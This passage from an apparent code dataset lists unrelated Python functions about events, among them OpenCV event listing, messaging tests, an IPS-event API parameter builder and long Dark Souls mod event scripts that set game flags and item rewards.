\"records\": [],\n \"status\": Status.ERROR,\n \"member\": uuid,\n \"statusText\": f\"Failed {e.__class__.__name__}\",\n }\n )", "def list_events():\n return [\n snow,\n mosquito,\n sun_heat,\n orage,\n overflowing,\n gathering,\n trampling,\n pollution,\n southern_wind,\n northern_wind,\n fog,\n sun\n ]", "def eventList(filterStr=\"\"):\n\tfilterStr = filterStr.upper()\n\tevents = [i for i in dir(cv2) if 'EVENT' in i and filterStr in i]\n\treturn events", "def _handler_unknown_discover(self, *args, **kwargs):\n\n # force to command mode, this instrument has no autosample mode\n next_state = ProtocolState.COMMAND\n result = []\n\n return next_state, (next_state, result)", "def test_make_event_defaults_dr(self):\n msg_helper = MessageHelper()\n event = msg_helper.make_event(\n 'delivery_report', 'abc123', delivery_status='pending')\n expected_event = TransportEvent(\n event_type='delivery_report', user_message_id='abc123',\n delivery_status='pending',\n transport_type=msg_helper.transport_type,\n transport_name=msg_helper.transport_name,\n transport_metadata={}, helper_metadata={},\n # These fields are generated in both messages, so copy them.\n event_id=event['event_id'], timestamp=event['timestamp'])\n self.assertEqual(expected_event, event)", "def get_event_actions_mapping(self):\n return None", "def event_name_choices(self): \n query = \"\"\"\n SELECT DISTINCT event_name\n FROM tubidw.sampled_analytics_thousandth\n WHERE date >= dateadd('day',-2,GETDATE())\n \"\"\"\n df = tdr.query_redshift(query).to_df()\n return ['no event filter'] + pd.Series(df['event_name']).sort_values().tolist()", "def get_events_params(args: Dict[str, Any]) -> Dict[str, Any]:\n params: Dict[str, Any] = {'event_type': 'Ips Event'}\n arg_keys = args.keys()\n\n if 'duration' in arg_keys:\n params['duration'] = args.get('duration', '')\n\n if 'start_time' in arg_keys:\n start_time = args.get('start_time', '')\n date_time = dateparser.parse(start_time)\n if date_time:\n params['start_time'] = str(\n date_time.strftime(API_SUPPORT_DATE_FORMAT)\n )\n else:\n raise ValueError(\n MESSAGES['INVALID_TIME_VALIDATION'].format('start_time')\n )\n\n if 'end_time' in arg_keys:\n end_time = args.get('end_time', '')\n date_time = dateparser.parse(end_time)\n if date_time:\n params['end_time'] = str(\n date_time.strftime(API_SUPPORT_DATE_FORMAT)\n )\n else:\n raise ValueError(\n MESSAGES['INVALID_TIME_VALIDATION'].format('end_time')\n )\n\n if 'mvx_correlated_only' in arg_keys:\n mvx_correlated_only = args.get('mvx_correlated_only', '').lower()\n try:\n mvx_correlated_only = argToBoolean(mvx_correlated_only)\n params['mvx_correlated_only'] = mvx_correlated_only\n except ValueError:\n raise ValueError(\n MESSAGES['INVALID_BOOLEAN_VALUE_ERROR'].format(\n 'mvx_correlated_only'\n )\n )\n\n return params", "def events(self) -> Dict[EventCall, Set[Node]]:\n return self._events", "def handleEvents(self, events):\n pass", "def visit_event(self, event):", "def _default_events_fetcher(self):\n raise NotImplementedError", "def _default_events_fetcher(self):\n raise NotImplementedError", "def _receive_multiple(self, what, address, **kwargs):\n\n print('_receive_multiple: please override me.')", "def get_timeline_events(self, req, start, stop, filters):", "def set_events(self, events, extended=False):\r\n if extended:\r\n plog (\"DEBUG\", \"SETEVENTS EXTENDED %s\\r\\n\" % \" \".join(events))\r\n self.sendAndRecv(\"SETEVENTS EXTENDED %s\\r\\n\" % \" \".join(events))\r\n else:\r\n self.sendAndRecv(\"SETEVENTS %s\\r\\n\" % \" \".join(events))", "def event0():\n header(0, 0)\n end_if_client()\n\n if DEBUG.GET_MASTER_KEY:\n flag.disable(50004066)\n item.award_item_to_host_only(4073)\n if DEBUG.HAS_RUSTBONE:\n flag.enable(EVENT.HasBonerust)\n if DEBUG.SPEED_UP_PLAYER:\n chr.set_special_effect(CHR.Player, 2370)\n if DEBUG.GET_CHTHONIC_SPARK:\n flag.disable(50001510) # Thrall Spark drop flag.\n item.award_item_to_host_only(ITEMLOT.ThrallReward)\n\n for flag_id in (760, 762, 765):\n flag.disable(flag_id)\n\n # Display a message after an event flag is enabled (with optional delay).\n run_event_with_slot(260, 0, args=(11810000, 10010600, 0), arg_types='iif') # Arrival in Lordran.\n run_event_with_slot(260, 1, args=(257, 10010610, 0), arg_types='iif') # Rite of Kindling.\n run_event_with_slot(260, 2, args=(EVENT.ObtainedChthonicSpark, 10010620, 0), arg_types='iif') # Chthonic Spark.\n run_event_with_slot(260, 3, args=(11412053, 10010621, 0), arg_types='iif') # Chthonic Spark stolen.\n run_event_with_slot(260, 4, args=(EVENT.LordvesselReceived, TEXT.LordvesselWarpUnlocked, 0), arg_types='iif')\n\n # Assorted events (see documentation). Mostly monitoring states. 710 monitors warping ability.\n for event_id in (761, 763, 290, 701, 702, 717, 718,\n 706, 740, 750, 752, 757, 758, 759,\n 754, 770, 772, 730, 731, 766, 710):\n run_event(event_id)\n\n # Monitor Lord Souls/Shard possession. Doesn't include Dark Remnant.\n run_event_with_slot(711, 0, args=(2500, 711)) # Gravelord Nito\n run_event_with_slot(711, 1, args=(2501, 712)) # Bed of Chaos\n run_event_with_slot(711, 2, args=(2502, 713)) # Four Kings\n run_event_with_slot(711, 3, args=(2503, 714)) # Seath the Scaleless\n\n run_event(715) # Player has Gwyn's Soul.\n run_event(716) # Player has Sunlight Spear.\n run_event(11512000) # (New) Player has been given Lordvessel.\n\n # Monitor Estus upgrade level.\n for slot, args in enumerate(zip(range(202, 215, 2), range(203, 216, 2))):\n run_event_with_slot(8131, slot, args)\n\n run_event(819) # Monitor repair box sync.\n\n run_event(2540) # (New) Ring of the Embraced punishes you if removed.\n run_event(2541) # (New) Ring of Temptation activates after 15 seconds.\n run_event(2542) # (New) Ring of Temptation takes your souls and breaks if you die.\n run_event(2543) # (New) Ring of the Evil Eye kill reward.\n run_event(2544) # (New) Twilight Ring effect starts and ends.\n run_event(2545) # (New) Twilight Ring effect waxes and wanes.\n run_event(2546) # (New) Bond to Beyond has a 5% chance of giving one soft humanity.\n run_event(2547) # (New) Contract and heal Bonerust (11302050)\n run_event(2548) # (New) Kills heal with Nahr Alma pact.\n run_event(2549) # (New) Ring of Condemnation recharges.\n run_event(11502020) # (New) Lithic Witness event.\n run_event(11502023) # (New) Beyond Witness event.\n\n # (New) Toggles availability of full bonfire menu based on Spark possession.\n run_event(11512005)\n\n # BOSS DROPS\n\n for slot, args in enumerate((\n # boss_dead_flag, immediate_item_lot, delayed_item_lot_1, delayed_item_lot_2\n (2, ITEMLOT.AriamisReward, 9020, 9030),\n (11010901, ITEMLOT.TaurusDemonReward, 9000, 9030),\n (11010904, ITEMLOT.ProfaneImageReward, 0, 0),\n (3, ITEMLOT.BellGargoylesReward, 9020, 0),\n (4, ITEMLOT.CrossbreedPriscillaReward, 9020, 0),\n (11200900, ITEMLOT.MoonlightButterflyReward, 9000, 0),\n (11200901, ITEMLOT.GravestalkersReward, 9030, 0),\n (5, ITEMLOT.AbyssArtoriasReward, 9000, 0),\n (6, ITEMLOT.PinwheelReward, 9000, 9030),\n (7, ITEMLOT.NitoReward, 9000, 9030),\n (9, ITEMLOT.QuelaagReward, 9020, 0),\n (11410902, ITEMLOT.CeaselessDischargeReward, 9000, 9030),\n (11412055, ITEMLOT.JeremiahReward, 9000, 0),\n (11410901, ITEMLOT.CentipedeDemonReward, 9000, 9030),\n (10, ITEMLOT.BedOfChaosReward, 9000, 9030),\n (11, ITEMLOT.SensGolemReward, 9000, 0),\n (11510900, ITEMLOT.GwyndolinReward, 0, 0),\n (11510901, ITEMLOT.JareelReward, 0, 0),\n (11510902, ITEMLOT.OrnsteinReward, 9000, 0),\n (11510903, ITEMLOT.SmoughReward, 9000, 0),\n (11012012, ITEMLOT.ThrallReward, 0, 0),\n (13, ITEMLOT.FourKingsReward, 9010, 0),\n (14, ITEMLOT.SeathReward, 9000, 0),\n (11800001, ITEMLOT.GwynCinderReward, 0, 0),\n (16, ITEMLOT.AsylumDemonReward, 9000, 0),\n (11810901, ITEMLOT.StrayDemonReward, 9000, 9030),\n (11810902, ITEMLOT.AsylumTyrantReward, 9000, 9030),\n (11210000, ITEMLOT.SanctuaryGuardianReward, 9000, 0),\n (11210001, ITEMLOT.ArtoriasReward, 0, 0),\n (11212006, ITEMLOT.ManusReward, 9040, 0),\n (11210004, ITEMLOT.KalameetReward, 0, 0),\n (11212008, ITEMLOT.TwilightVagrantReward, 0, 0),\n (11512201, ITEMLOT.GwynLightReward, 0, 0),\n )):\n run_event_with_slot(1950, slot, args)\n\n # (New) Monitor Velka's pact. (1910 is enabled in Firelink Shrine.)\n run_event(1915) # Monitor pact breaking.\n run_event(1916) # Monitor Seath punishment.\n run_event(1917) # Monitor Nito punishment.\n run_event(1918) # Monitor Jeremiah punishment.\n\n # (New) Monitor challenge pacts.\n run_event(1900) # Kremmel.\n run_event(1901) # Zandroe.\n run_event(1902) # Caitha.\n run_event(1903) # Nahr Alma.\n run_event(1904) # Quella permanent Abyss warp.\n run_event(1905) # Monitor Etched Ring removal and curse player (non-Quella).\n run_event(1906) # Quella ring removal.\n\n run_event(1920) # (New) Return Xanthous Crown on next load when dropped. Uses 1921.\n run_event(1922) # (New) Warp to special Painted World event when Soul of Ariamis is consumed.\n run_event(1923) # (New) Award Chaos Fire Whip when Soul of the Exile is consumed.\n run_event(1924) # (New) Skeletons in Tomb go back to rest when you load a map other than Tomb or Catacombs.\n run_event(1925) # (New) Manages Dark Ember damage boost stacks.\n run_event(11025400) # (New) Manages Ruinous Hand kill charge-up.\n run_event(1926) # (New) Trigger Ruinous Hand explosion at full charge.\n run_event(1927) # (New) HP penalty for being hollow (25%).\n\n run_event(2510) # (New) Sable Rune control.\n run_event(2511) # (New) Lustrous Rune control.\n run_event(2512) # (New) Wraith Rune control.\n run_event(2513) # (New) Scintilla Rune control.\n run_event(2514) # (New) Omphalic Rune control.\n run_event(2515) # (New) Omphalic Rune kill counter and death trigger.\n run_event(2516) # (New) Pale White Rune control.\n run_event(2517) # (New) Reaper's Rune trigger.\n run_event(2518) # (New) Reaper's Rune kill counter.\n run_event(2519) # (New) Rhythm Rune triggers.\n run_event(2520) # (New) Ransackers Rune trigger.\n # (New) Ransackers Rune item map checks. (2521-2530) (No Kiln, no Asylum.)\n for slot, (block, area) in enumerate(((10, 0), (10, 1), (10, 2), (11, 0), (12, 0), (12, 1),\n (13, 0), (13, 1), (13, 2), (14, 0), (14, 1), (15, 0),\n (15, 1), (16, 0), (17, 0))):\n args = tuple([block, area] + [50000 + 100 * slot + 10 * i for i in range(0, 10)])\n run_event_with_slot(2521, slot, args=args, arg_types='BBiiiiiiiiii')\n \n # Activate Runes.\n for slot, rune in enumerate(range(9)):\n run_event_with_slot(2600, slot, args=(90 + rune, 11025350 + rune))\n\n # Monitor availability of bonfire options\n for slot, args in enumerate(zip(range(2600, 2610), range(250, 260))):\n run_event_with_slot(250, slot, args)\n\n # Remove Embers from inventory when given to blacksmiths. These are removed aggressively and repeatedly!\n for slot_args in zip((0, 1, 2, 6, 7, 8, 9, 10, 12),\n zip((350, 351, 352, 356, 357, 358, 359, 360, 362),\n (800, 801, 802, 806, 807, 808, 809, 810, 812))):\n run_event_with_slot(350, slot_args[0], slot_args[1])\n\n # (NEW) Chthonic Spark version of the above event, which also requires Vamos to be alive.\n run_event_with_slot(363, 0, args=(363, 813))\n\n # Monitor reinforcement material possession.\n for slot, args in enumerate(zip(range(1000, 1131, 10), range(780, 794))):\n run_event_with_slot(780, slot, args)\n\n # Monitor covenant membership.\n for slot, args in enumerate(zip(range(0, 10), range(850, 860))):\n run_event_with_slot(870, slot, args)\n\n # Covenant joining events. (args = trigger_flag, player_animation, rotation_target, looping_animation)\n for slot, args in enumerate(zip(range(840, 850), (7905, 7905, 7905, 7905, 7898, 7905, 7905, 7913, 7905, 7905),\n (6370, 6072, 6080, 6001, 10000, 6340, 6341, 10000, 6380, 1400700),\n (-1, -1, -1, -1, 7896, -1, -1, 7911, -1, -1))):\n run_event_with_slot(840, slot, args)\n\n # Monitor NG+ level. Uses flags 690 (NG) to 705 (NG+15).\n run_event_with_slot(690, 0, args=(600, 4, 16, 1175))\n\n run_event(719) # Monitor possession of any spell.\n run_event(720) # Monitor possession of any pyromancy.\n\n # Monitor whether shops are sold out.\n # NOTE: This all suggests that shopkeeper flags are in the 7000 range for their area. Avoid!\n run_event(721) # Big Hat Logan in Duke's Archives.\n run_event(722) # Quelana of Izalith.\n run_event(723) # Griggs at Firelink Shrine.\n run_event(724) # Male Undead Merchant. (I don't think this does anything.)\n run_event(725) # Checks if you've bought 2+ items from Logan in Duke's Archives.\n run_event(726) # Checks if you've bought 2+ items from Ingward in New Londo Ruins.\n run_event(727) # Checks flags in Ash Lake / Great Hollow. Not sure who this is.\n\n run_event(745) # Cut Shiva questline I think.\n run_event(818) # Black Eye Orb quivers in Anor Londo.\n run_event(810) # Monitor possession of Lautrec's Black Eye Orb.\n # Lautrec frees himself from New Londo if both item flags below are enabled.\n run_event_with_slot(812, 0, args=(51400150,)) # Monitor possession of Blighttown Fire Keeper Soul (moved).\n run_event_with_slot(812, 1, args=(51010050,)) # Monitor possession of Undead Parish Humanity (still on altar).\n run_event(822) # Disable flag 830 half a second after leaving the Kiln. (Frampt pickup.)\n run_event(823) # Disable flag 831 half a second after leaving the Kiln. (Kaathe pickup.)\n\n # (New) Monitor dead NPCs for Twilight Vagrant. Counts friendly or hollow death, unless noted otherwise.\n for slot, npc_dead_flag in enumerate((\n 1073, # 2051: Oscar (friendly) (must be enabled in tutorial)\n 1097, # 2052: Big Hat Logan\n 1115, # 2053: Griggs\n 1005, # 2054: Solaire (note this won't trigger if he is killed when Hollow, unlike other NPCs)\n 1254, # 2055: Laurentius\n 1462, # 2056: Crestfallen Warrior\n 1575, # 2057: Lautrec\n 1604, # 2058: Shiva\n 1628, # 2059: Patches\n 1899, # 2060: Havel\n 1864, # 2061: Ciaran (in Oolacile and/or with Nito)\n 1823, # 2062: Hawkeye Gough\n 5, # 2063: Artorias (in Darkroot)\n )):\n run_event_with_slot(11212050, slot + 1, args=(npc_dead_flag,))\n\n # (New) Monitor Tomb of the Giants presence to send Giant Skeletons back to sleep.\n run_event(11310201)\n\n # (New) Monitor picking up Chthonic Spark for the first time to display message.\n run_event(11512004)\n\n # EVENT REWARDS (covenants, storylines)\n\n run_event_with_slot(910, 0, args=(11400591, 1280)) # Joining Chaos Servants.\n run_event_with_slot(911, 0, args=(11010591, 1000, 1), arg_types='iiB')\n run_event_with_slot(911, 1, args=(11510590, 1010, 1), arg_types='iiB')\n run_event_with_slot(911, 2, args=(11700591, 1020, 1), arg_types='iiB')\n run_event_with_slot(911, 3, args=(11000591, 1030, 1), arg_types='iiB')\n run_event_with_slot(911, 4, args=(11400590, 1040, 1), arg_types='iiB')\n run_event_with_slot(911, 5, args=(11410594, 1050, 1), arg_types='iiB')\n run_event_with_slot(911, 6, args=(11020594, 1060, 1), arg_types='iiB')\n run_event_with_slot(911, 7, args=(11020595, 1070, 1), arg_types='iiB')\n run_event_with_slot(911, 8, args=(11810590, 1082, 1), arg_types='iiB')\n run_event_with_slot(911, 9, args=(11810591, 1080, 1), arg_types='iiB')\n run_event_with_slot(911, 10, args=(11510592, 1090, 1), arg_types='iiB')\n run_event_with_slot(911, 11, args=(11600592, 1100, 1), arg_types='iiB')\n run_event_with_slot(911, 12, args=(11020602, 1110, 1), arg_types='iiB')\n run_event_with_slot(911, 13, args=(11010594, 1120, 1), arg_types='iiB')\n run_event_with_slot(911, 14, args=(11010595, 1130, 1), arg_types='iiB')\n run_event_with_slot(911, 15, args=(11020599, 1140, 1), arg_types='iiB')\n run_event_with_slot(911, 16, args=(11020607, 1150, 1), arg_types='iiB')\n run_event_with_slot(911, 17, args=(11200592, 1160, 1), arg_types='iiB')\n run_event_with_slot(911, 18, args=(11200593, 1170, 1), arg_types='iiB')\n run_event_with_slot(911, 19, args=(11200594, 1180, 1), arg_types='iiB')\n run_event_with_slot(911, 20, args=(11300590, 1190, 1), arg_types='iiB')\n run_event_with_slot(911, 21, args=(11300591, 1200, 1), arg_types='iiB')\n run_event_with_slot(911, 22, args=(11310590, 1210, 1), arg_types='iiB')\n run_event_with_slot(911, 23, args=(11310592, 1220, 1), arg_types='iiB')\n run_event_with_slot(911, 24, args=(11310593, 1230, 1), arg_types='iiB')\n run_event_with_slot(911, 25, args=(11310594, 1240, 1), arg_types='iiB')\n run_event_with_slot(911, 26, args=(11320590, 1250, 1), arg_types='iiB')\n run_event_with_slot(911, 27, args=(11320581, 1260, 1), arg_types='iiB')\n run_event_with_slot(911, 28, args=(11320593, 1270, 1), arg_types='iiB')\n run_event_with_slot(911, 29, args=(11400592, 1290, 1), arg_types='iiB')\n run_event_with_slot(911, 30, args=(11400594, 1300, 1), arg_types='iiB')\n run_event_with_slot(911, 31, args=(11400596, 1310, 1), arg_types='iiB')\n run_event_with_slot(911, 32, args=(11400597, 1320, 1), arg_types='iiB')\n run_event_with_slot(911, 33, args=(11400598, 1330, 1), arg_types='iiB')\n run_event_with_slot(911, 34, args=(11400599, 1340, 1), arg_types='iiB')\n run_event_with_slot(911, 35, args=(11510595, 1350, 1), arg_types='iiB')\n run_event_with_slot(911, 36, args=(11510596, 1360, 1), arg_types='iiB')\n run_event_with_slot(911, 37, args=(11510597, 1370, 1), arg_types='iiB')\n run_event_with_slot(911, 38, args=(11600594, 1380, 1), arg_types='iiB')\n run_event_with_slot(911, 39, args=(11600595, 1390, 1), arg_types='iiB')\n run_event_with_slot(911, 40, args=(11600596, 1400, 1), arg_types='iiB')\n run_event_with_slot(911, 41, args=(11010598, 1410, 0), arg_types='iiB')\n run_event_with_slot(911, 42, args=(11210590, 1500, 1), arg_types='iiB')\n run_event_with_slot(911, 43, args=(11210593, 1510, 1), arg_types='iiB')\n run_event_with_slot(911, 44, args=(11210594, 1520, 1), arg_types='iiB')\n run_event_with_slot(911, 45, args=(11600580, 1401, 1), arg_types='iiB')\n run_event_with_slot(911, 46, args=(11600581, 1402, 1), arg_types='iiB')\n run_event_with_slot(911, 47, args=(11600582, 1403, 1), arg_types='iiB')\n run_event_with_slot(911, 48, args=(11600583, 1404, 1), arg_types='iiB')\n run_event_with_slot(890, 0, args=(11310580, 1221, 1), arg_types='iiB') # 911 ran out of slots (up against 960).\n run_event_with_slot(890, 1, args=(11510580, 1361, 1), arg_types='iiB')\n run_event_with_slot(890, 2, args=(11510581, 1371, 1), arg_types='iiB')\n run_event_with_slot(890, 3, args=(11320592, 1261, 1), arg_types='iiB')\n\n # DIRECT NPC DEATH REWARDS (960-969)\n run_event_with_slot(960, 0, args=(1315, 6180, 1100)) # Ingward (Key to the Seal)\n run_event_with_slot(960, 1, args=(1402, 6230, 6230)) # Undead Merchant (Orange Soapstone)\n # run_event_with_slot(960, 2, args=(1198, 6080, 1140)) # Petrus (Lift Chamber Key) (dies before killing Rhea)\n # run_event_with_slot(960, 3, args=(1196, 6080, 1140)) # Petrus (Lift Chamber Key) (dies after killing Rhea)\n\n # NEW GAME PLUS: Bring covenant ranks up to date, and prevent gifts from being re-awarded.\n run_event_with_slot(8200, 0, args=(3, 5500, 50000120, 11010594))\n run_event_with_slot(8200, 1, args=(3, 5510, 50000130, 11010595))\n run_event_with_slot(8200, 2, args=(2, 103, 50000160, 11200592))\n run_event_with_slot(8200, 3, args=(3, 240, 50000170, 11200593))\n run_event_with_slot(8200, 4, args=(2, 124, 50000180, 11200594))\n run_event_with_slot(8200, 5, args=(0, 453000, 50000220, 11310592))\n run_event_with_slot(8200, 6, args=(3, 5100, 50000225, 11310580))\n run_event_with_slot(8200, 7, args=(3, 5110, 50000230, 11310593))\n run_event_with_slot(8200, 8, args=(3, 114, 50000265, 11320581))\n run_event_with_slot(8200, 9, args=(3, 377, 50000260, 11320592))\n run_event_with_slot(8200, 10, args=(3, 378, 50000270, 11320593))\n run_event_with_slot(8200, 11, args=(3, 4500, 50000310, 11400596))\n run_event_with_slot(8200, 12, args=(3, 4520, 50000320, 11400597))\n run_event_with_slot(8200, 13, args=(3, 4510, 50000330, 11400598))\n run_event_with_slot(8200, 14, args=(2, 130, 50000350, 11510595))\n run_event_with_slot(8200, 15, args=(3, 113, 50000360, 11510596))\n run_event_with_slot(8200, 16, args=(2, 102, 50000365, 11510580))\n run_event_with_slot(8200, 17, args=(3, 5910, 50000370, 11510597))\n run_event_with_slot(8200, 18, args=(0, 1366000, 50000375, 11510581))\n run_event_with_slot(8200, 19, args=(0, 904000, 50000380, 11600594))\n run_event_with_slot(8200, 20, args=(3, 102, 50000390, 11600595))\n run_event_with_slot(8200, 21, args=(0, 210000, 50000400, 11600596))\n run_event_with_slot(8200, 22, args=(1, 40000, 50000410, 11600580))\n run_event_with_slot(8200, 23, args=(1, 41000, 50000420, 11600581))\n run_event_with_slot(8200, 24, args=(1, 42000, 50000430, 11600582))\n run_event_with_slot(8200, 25, args=(1, 43000, 50000440, 11600583))\n\n # Same as above, but for other special rewards.\n run_event_with_slot(8300, 0, args=(ItemType.good, 100, 50000000)) # White Sign Soapstone\n run_event_with_slot(8300, 1, args=(ItemType.good, 101, 51100330)) # Red Sign Soapstone\n run_event_with_slot(8300, 2, args=(ItemType.good, 102, 50000390)) # Red Eye Orb\n run_event_with_slot(8300, 3, args=(ItemType.good, 106, 11017020)) # Orange Guidance Soapstone\n run_event_with_slot(8300, 4, args=(ItemType.good, 108, 11607020)) # Book of the Guilty\n run_event_with_slot(8300, 5, args=(ItemType.good, 112, 11407080)) # Servant Roster\n run_event_with_slot(8300, 6, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 7, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 8, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 9, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n\n # NOTE: Flag 8310 onwards is used for NPC humanity registration.\n\n # Same as above for DLC items.\n run_event_with_slot(8090, 0, args=(ItemType.good, 510, 11217010))\n run_event_with_slot(8090, 1, args=(ItemType.good, 511, 11217020))\n run_event_with_slot(8090, 2, args=(ItemType.good, 512, 11217030))\n run_event_with_slot(8090, 3, args=(ItemType.good, 513, 11217040))\n run_event_with_slot(8090, 4, args=(ItemType.good, 514, 11217050))\n\n # (New) Same as above, but for Runes and other new items.\n run_event_with_slot(11022100, 0, args=(ItemType.good, 900, 51010020))\n run_event_with_slot(11022100, 1, args=(ItemType.good, 901, 51510690))\n run_event_with_slot(11022100, 2, args=(ItemType.good, 902, 51200120))\n run_event_with_slot(11022100, 3, args=(ItemType.good, 903, 51410030))\n run_event_with_slot(11022100, 4, args=(ItemType.good, 904, 51810080))\n run_event_with_slot(11022100, 5, args=(ItemType.good, 905, 51700020))\n run_event_with_slot(11022100, 6, args=(ItemType.good, 906, 51300220))\n run_event_with_slot(11022100, 7, args=(ItemType.good, 907, 51300221))\n run_event_with_slot(11022100, 8, args=(ItemType.good, 908, 51210290))\n run_event_with_slot(11022100, 9, args=(ItemType.ring, 133, 50000650)) # Velka gift (Ring of Condemnation)\n run_event_with_slot(11022100, 10, args=(ItemType.ring, 124, 50001780)) # Twilight Vagrant drop (Twilight Ring)\n run_event_with_slot(11022100, 11, args=(ItemType.ring, 105, 50004900)) # Lithic Bond\n run_event_with_slot(11022100, 12, args=(ItemType.ring, 107, 50004910)) # Serous Bond\n run_event_with_slot(11022100, 13, args=(ItemType.ring, 106, 50004920)) # Empyrean Bond\n run_event_with_slot(11022100, 14, args=(ItemType.ring, 108, 50004930)) # Bond to Beyond\n # Leaving slots 11022100-11022119 dedicated to this.\n\n # (NEW) Remove some additional new items in NG+.\n run_event_with_slot(11022120, 0, args=(ItemType.ring, 152)) # Ashen Ring\n run_event_with_slot(11022120, 1, args=(ItemType.ring, 151)) # Gwynevere's Ring\n run_event_with_slot(11022120, 2, args=(ItemType.good, 220)) # Silver Pendant\n run_event_with_slot(11022120, 3, args=(ItemType.armor, 294000)) # Xanthous Crown (true)\n run_event_with_slot(11022120, 4, args=(ItemType.ring, 149)) # Darkmoon Seance Ring", "def do_target_event_switches(self):\n caller = self.caller\n lhslist = self.lhs.split(\"/\")\n if len(lhslist) > 1:\n lhs = lhslist[0]\n rhs = lhslist[1]\n else:\n lhs = self.lhs\n rhs = self.rhs\n if \"sponsor\" in self.switches:\n from django.core.exceptions import ObjectDoesNotExist\n\n event = self.get_event_from_args(self.rhs)\n try:\n org = Organization.objects.get(name__iexact=self.lhslist[0])\n except Organization.DoesNotExist:\n raise self.CalCmdError(\"No Organization by that name.\")\n if not org.access(self.caller, \"withdraw\"):\n raise self.CalCmdError(\n \"You do not have permission to spend funds for %s.\" % org\n )\n if event.finished:\n raise self.CalCmdError(\"Try as you might, you cannot alter the past.\")\n try:\n amount = int(self.lhslist[1])\n if amount < 1:\n raise ValueError\n except (TypeError, ValueError):\n raise self.CalCmdError(\n \"You must provide a positive number of social resources to add.\"\n )\n try:\n sponsoring = event.add_sponsorship(org, amount)\n except ObjectDoesNotExist:\n raise self.CalCmdError(\n \"The organization must be invited before they can sponsor.\"\n )\n self.msg(\n \"%s is now sponsoring %s for %d social resources.\"\n % (org, event, sponsoring.social)\n )\n return\n event = self.get_event_from_args(lhs)\n if \"join\" in self.switches:\n diff = time_from_now(event.date).total_seconds()\n if diff > 3600:\n caller.msg(\"You cannot join the event until closer to the start time.\")\n return\n if event.plotroom is None:\n caller.msg(\n \"That event takes place on the normal grid, so you can just walk there.\"\n )\n return\n if event.location is None:\n caller.msg(\"That event has no location to join.\")\n return\n caller.msg(\"Moving you to the event location.\")\n mapping = {\"secret\": True}\n caller.char_ob.move_to(event.location, mapping=mapping)\n # display info on a given event\n if not rhs:\n caller.msg(event.display(), options={\"box\": True})\n return\n try:\n num = int(rhs)\n if num < 1:\n raise ValueError\n comments = list(\n event.comments.filter(db_tags__db_key=\"white_journal\").order_by(\n \"-db_date_created\"\n )\n )\n caller.msg(caller.char_ob.messages.disp_entry(comments[num - 1]))\n return\n except (ValueError, TypeError):\n caller.msg(\"Must leave a positive number for a comment.\")\n return\n except IndexError:\n caller.msg(\"No entry by that number.\")\n return", "def event0():\n header(0, 0)\n\n if DEBUG.GET_CHTHONIC_SPARK:\n item.award_item_to_host_only(1600)\n if DEBUG.GET_DARKMOON_SEANCE_RING:\n item.award_item_to_host_only(1600310)\n if DEBUG.GWYNDOLIN_DEAD:\n flag.enable(EVENT.GwyndolinDead)\n item.award_item_to_host_only(2600)\n if DEBUG.ORNSTEIN_AND_SMOUGH_DEAD:\n flag.enable(EVENT.OrnsteinAndSmoughDead)\n if DEBUG.DARK_ANOR_LONDO:\n flag.enable(EVENT.OrnsteinAndSmoughDead)\n flag.enable(EVENT.GwyndolinDead)\n flag.enable(EVENT.DarkAnorLondo)\n if DEBUG.GET_LAUTREC_BLACK_EYE_ORB:\n item.award_item_to_host_only(2034)\n if DEBUG.CAPRICIOUS_THRALL_ACTIVE:\n flag.enable(EVENT.CapriciousThrallActive)\n if DEBUG.GET_BUTTERFLY_SOUL:\n item.award_item_to_host_only(2530)\n item.award_item_to_host_only(0)\n if DEBUG.DISABLE_FOG_ARCHER:\n chr.disable(CHR.SilverKnightArcherNearBossFog)\n if DEBUG.JAREEL_DEAD:\n flag.enable(EVENT.JareelDead)\n\n skip_if_event_flag_off(1, EVENT.OrnsteinAndSmoughDead)\n map.register_bonfire(11510920, 1511950)\n for bonfire_flag, bonfire_id, kindle_level in zip((11510992, 11510984, 11510976), (1511960, 1511961, 1511962),\n (10, 0, 0)):\n map.register_bonfire(bonfire_flag, bonfire_id, initial_kindle_level=kindle_level)\n map.register_ladder(11510010, 11510011, 1511140)\n map.register_ladder(11510012, 11510013, 1511141)\n\n # Make elevator work immediately (and skip cutscene).\n flag.enable(11510305)\n\n flag.disable(11510304)\n skip_if_client(2)\n obj.disable(1511994)\n sfx.delete_map_sfx(1511995, False)\n obj.disable(1511310)\n for hitbox_id in (1513301, 1513302, 1513303):\n hitbox.disable_hitbox(hitbox_id)\n skip_if_event_flag_off(1, 11510300)\n skip_if_event_flag_off(6, 11510303)\n flag.disable(11510301)\n flag.disable(11510302)\n flag.enable(11510303)\n anim.end_animation(1511300, 53)\n hitbox.enable_hitbox(1513303)\n skip(13)\n skip_if_event_flag_off(6, 11510302)\n flag.disable(11510301)\n flag.enable(11510302)\n flag.disable(11510303)\n anim.end_animation(1511300, 50)\n hitbox.enable_hitbox(1513302)\n skip(6)\n skip_if_event_flag_off(5, 11510301)\n flag.enable(11510301)\n flag.disable(11510302)\n flag.disable(11510303)\n anim.end_animation(1511300, 51)\n hitbox.enable_hitbox(1513301)\n\n obj.disable(1511450)\n flag.disable(11510460)\n run_event_with_slot(11510090, 0, (1511700, 1511701, 1512600, 1512601))\n run_event_with_slot(11510090, 1, (1511702, 1511703, 1512602, 1512603))\n\n for event_id in (11515040, 11515041, 11515042):\n run_event(event_id)\n\n run_event(11510200) # Rotating lever to open palace.\n run_event(11510205) # (New) Rotating lever to open palace in Dark Anor Londo (Jareel must be dead).\n run_event(11510201) # Palace locked from the outside.\n run_event(11510100) # Break chandelier.\n run_event(11510210) # Open one-way gate to blacksmith.\n run_event(11510211) # Blacksmith gate is locked.\n run_event(11510220) # First activation of gondola. (Now pre-enabled.)\n run_event(11510300) # Main gondola activation.\n run_event(11510319) # Gondola flags.\n run_event(11510340) # Gondola navimesh.\n run_event(11510350) # Gondola sync.\n run_event(11510310) # Gondola lever can't be pushed.\n run_event(11515250) # Painting Guardian ambush.\n run_event(11515251) # Provoke a Silver Knight.\n run_event(11510110) # Open door to Sun Chamber. (Now requires key.)\n run_event(11510111) # (New) Sun Chamber is locked.\n run_event(11510400) # Trigger Dark Anor Londo.\n run_event(11510401) # Disable Darkmoon Tomb statue.\n run_event(11510230) # Enter Painted World if you have the Painted Doll.\n run_event(11510240) # Return to 